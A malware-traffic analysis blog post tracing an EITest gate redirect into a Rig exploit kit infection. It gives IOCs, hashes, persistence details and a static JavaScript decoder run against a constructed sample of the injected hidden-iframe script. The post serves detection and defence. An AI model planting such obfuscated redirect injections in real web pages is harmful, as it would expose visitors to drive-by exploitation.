EITest Gate at 31.184.192.173 Leads to Rig EK at 185.141.25.28 and Drops… ?

IOCs:

  • 66.84.14.125 – orfab.com – Compromised Site
  • 31.184.192.173 – piperandscoot.top – EITest Gate
  • 185.141.25.28 – jxlyv.xajee73.top – Rig EK
  • 185.146.171.131/bt/logout.php – post infection callback traffic

Hashes:

SHA256: cc21bee629f99e6a5e5b433f593670b2dea4075b6252fb04fd1bfbb40fbf8e80
File name: EITest Flash Redirect.swf

SHA256: bf9cda2afc425019312f8c4bc5856ad8378ea980dcd3e195e615224c6777eb5c
File name: EITest Gate.html

SHA256: c73c63f4b5ebd3ebe7c4de16a99519c876a93c50b12b1a3406c28c2929752d68
File name: RigEK Landing Page.html

SHA256: 970491ca792332f3479200c94dddfe7d77112beb0b879d5becb279010860b487
File name: RigEK Flash Exploit.swf

Traffic:

[Image: packet capture of the full infection traffic]

As you can probably tell from the image of the traffic above, I let the host sit for a long time. I was hoping to grab more IOCs and get more clues as to the identity of the malware.

Unfortunately, I haven’t yet been able to ID this post-infection traffic. The IP has no reputation history on VirusTotal, and searching for the URI or the IP via Google didn’t return any useful results. One thing I want to point out is that these POST requests were occurring at ten-minute intervals.

Additional research showed that 185.146.171.131 belongs to AS 203049 CLOUDPRO in Russia. The Whois record shows the netname as FIRSTBYTE-RU-MSK, a Russian hosting provider. I also happened to see the host making several DNS requests for PTR records. The reverse DNS requests were for 131.171.146.185.in-addr.arpa. The responses to these reverse DNS requests were the following:

[Image: PTR request and response for 131.171.146.185.in-addr.arpa]

You can see from the UDP traffic above that the responses show three FirstByte DNS servers. On to the infection chain…

Infection Chain:

The infection chain for this started out with browsing to the compromised website. Below is an image showing the obfuscated and encoded EITest script in the website’s source code:

[Image: obfuscated EITest script in the compromised site’s source]

The script is obfuscated and hex-encoded. Calling replace() to swap every underscore for a percent sign removes the obfuscation and leaves percent-encoded hex data. That data is then decoded with decodeURIComponent() and written into the page with document.write(). Here is the script fully deobfuscated and decoded:

[Image: EITest script, deobfuscated and decoded]
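To decode this kind of injection without ever executing it, here is an added example (not code from the post) that performs the same two transforms statically, underscore-to-percent followed by decodeURIComponent(), and then harvests the embedded URL for blocking or log hunting. The sample script and the host gate.example.invalid are constructed for the example and are not indicators from the post.

```javascript
// Constructed sample mimicking the shape of the injected EITest script:
// an underscore-separated hex literal, replace("_" -> "%"), decodeURIComponent,
// document.write. The decoded content is a hypothetical 1x1 iframe.
const SAMPLE_SCRIPT = `<script>
var _0x = "_3C_69_66_72_61_6D_65_20_73_72_63_3D_22_68_74_74_70_3A_2F_2F_67_61_74_65_2E_65_78_61_6D_70_6C_65_2E_69_6E_76_61_6C_69_64_2F_72_22_3E_3C_2F_69_66_72_61_6D_65_3E";
document.write(decodeURIComponent(_0x.replace(/_/g, "%")));
</script>`;

// Pull every "_XX_XX..." string literal out of a script body.
function findEncodedLiterals(script) {
  const re = /"((?:_[0-9A-Fa-f]{2})+)"/g;
  const found = [];
  let m;
  while ((m = re.exec(script)) !== null) found.push(m[1]);
  return found;
}

// Undo the obfuscation for one literal: "_" -> "%" then percent-decode.
// decodeURIComponent throws URIError on malformed input, which we want
// surfaced rather than hidden during analysis.
function deobfuscate(literal) {
  return decodeURIComponent(literal.replace(/_/g, "%"));
}

// Decode every encoded literal found in a script; nothing is written or run.
function decodeScript(script) {
  return findEncodedLiterals(script).map(deobfuscate);
}

// Harvest http(s) URLs from decoded HTML so the next hop in the chain
// (here the Flash redirect) can be blocked or searched for in proxy logs.
function extractUrls(html) {
  return html.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Stand-alone usage: print each decoded payload and the URLs it contains.
for (const payload of decodeScript(SAMPLE_SCRIPT)) {
  console.log("decoded:", payload);
  console.log("urls:", extractUrls(payload));
}
```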

The purpose of the EITest script is to give the host instructions to download the EITest Flash file. The location for the Flash file is shown in the URL in the script. Here is the GET request for that Flash file:

[Image: GET request for the EITest Flash redirect]

The EITest Flash file is used as a redirection mechanism as it contains the URL for the EITest Gate. Shown below is the GET request (redirection) for the EITest gate:

[Image: GET request for the EITest gate]

The EITest gate is the second-stage redirection mechanism in this infection chain. For example, you can see that there is a “.href = 'http:[Rig EK]'” containing the URL for the Rig EK landing page.

Here is the GET request for the landing page, as well as the GET requests for the Rig EK Flash Exploit and the payload:

[Image: GET requests for the Rig EK landing page and Flash exploit]

[Image: GET request for the Rig EK payload]

The infection from the Rig EK server caused a .tmp file to be dropped in %TEMP% and an executable named 1miy35koc5c3.exe.

[Image: contents of %TEMP% after infection]

That executable has a file description of “Windows Audit Service Update”. This payload seemed to be very similar to my last EITest infection written about HERE.

Here are some registry keys created by the malware:

[Images: three regedit screenshots of the created keys]

Notice that the file path shows “C:\ProgramData\Windows Audit Service Update\1miy35koc5c3.exe”; however, the malware has now hidden C:\ProgramData\ from me even though I have enabled “show hidden files”:

[Image: Explorer view with hidden files enabled, C:\ProgramData\ not shown]

More to come later…
